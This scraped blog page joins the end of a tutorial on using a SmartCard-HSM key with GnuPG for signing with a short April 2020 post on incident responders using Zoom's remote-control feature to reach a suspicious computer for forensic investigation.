S KEY-FRIEDNLY 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 /CN=gpg.intern.stafnet.local on UserPIN (SmartCard-HSM)
S CERTINFO 101 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
S KEYPAIRINFO 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
gnupg-pkcs11-scd[26682]: chan_0 <- RESTART
gnupg-pkcs11-scd[26682]: chan_0 -> OK
$ gnupg-pkcs11-scd[26682]: chan_0 <- [eof]
gnupg-pkcs11-scd[26682.2406156096]: post-processing connection
gnupg-pkcs11-scd[26682.2406156096]: accepting connection
gnupg-pkcs11-scd[26682.2406156096]: cleanup connection
gnupg-pkcs11-scd[26682.2406156096]: Terminating
gnupg-pkcs11-scd[26682.2369189632]: Thread command terminate
gnupg-pkcs11-scd[26682.2369189632]: Cleaning up threads

Import the key into GPG

$ gpg --expert --full-generate-key
gpg (GnuPG) 2.2.19; Copyright (C) 2019 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)
   (7) DSA (set your own capabilities)
   (8) RSA (set your own capabilities)
   (9) ECC and ECC
  (10) ECC (sign only)
  (11) ECC (set your own capabilities)
  (13) Existing key
  (14) Existing key from card
Your selection? 13

Use the KEY-FRIEDNLY string as the grip.


List your key

$ gpg --list-keys
pub   rsa2048 2020-05-02 [SCE]
uid           [ultimate] gpg.intern.stafnet.local (signing key) <>


Create a test file.

$ echo "I'm boe." > /tmp/boe



Enter your pin code.

│ Please enter the PIN (PIN required for token 'SmartCard-HSM (UserPIN)' (try 0))  │
│ to unlock the card                                                               │
│                                                                                  │
│ PIN ____________________________________________________________________________ │
│                                                                                  │
│            <OK>                                                <Cancel>          │   


$ gpg --verify /tmp/boe.gpg
gpg: Signature made Sat 02 May 2020 12:16:48 PM CEST
gpg: Good signature from "gpg.intern.stafnet.local (signing key) <>" [ultimate]

Have fun…


April 30, 2020

When you need to quickly investigate a suspicious computer located thousands of kilometers away or during a pandemic like we are facing these days, it could be critical to gain remote access to the computer. Just to perform basic investigations. Also, if the attacker did a clever job, he could be monitoring processes running on his/her target. In this case, you should prevent to use of classic remote management tools like VNC, TeamViewer, etc.

The following computer is running a LanDesk process which indicates that it can be controlled remotely:

Click to zoom

Also, if the suspicious computer is potentially under the control of the attacker, it could be interesting to not ring a bell by using classic tools. Today, web conferencing tools are very popular. Why not use them to gain remote access to start your investigations?

Via Zoom (but the feature is available via other tools), any participant to a web conference can share his/her screen but also transfer the control (mouse & keyboard) to a specific participant:

Click to zoom

Now, you can download your favourite tools (events collector, memory dumper, etc)… This technique has many advantages:

  • No need to reconfigure a firewall to allow incoming connections
  • There are chances that the web conferencing tool is already installed
  • From a forensic point of view, this has a small footprint: no new login events on the computer, no changes applied to the investigated computer.
  • You gain the same rights as the connected user (which can already be ‘administrator’ rights in some (bad) cases.

Back on Zoom, the free subscription limits the conference duration up to 40 minutes but it’s enough to launch some tasks on the remote computer. If the meeting is aborted, just restart a new one. Everything you launched will keep running…

[The post Web Conferencing Tools Used for Forensic Investigations has been first published on /dev/random]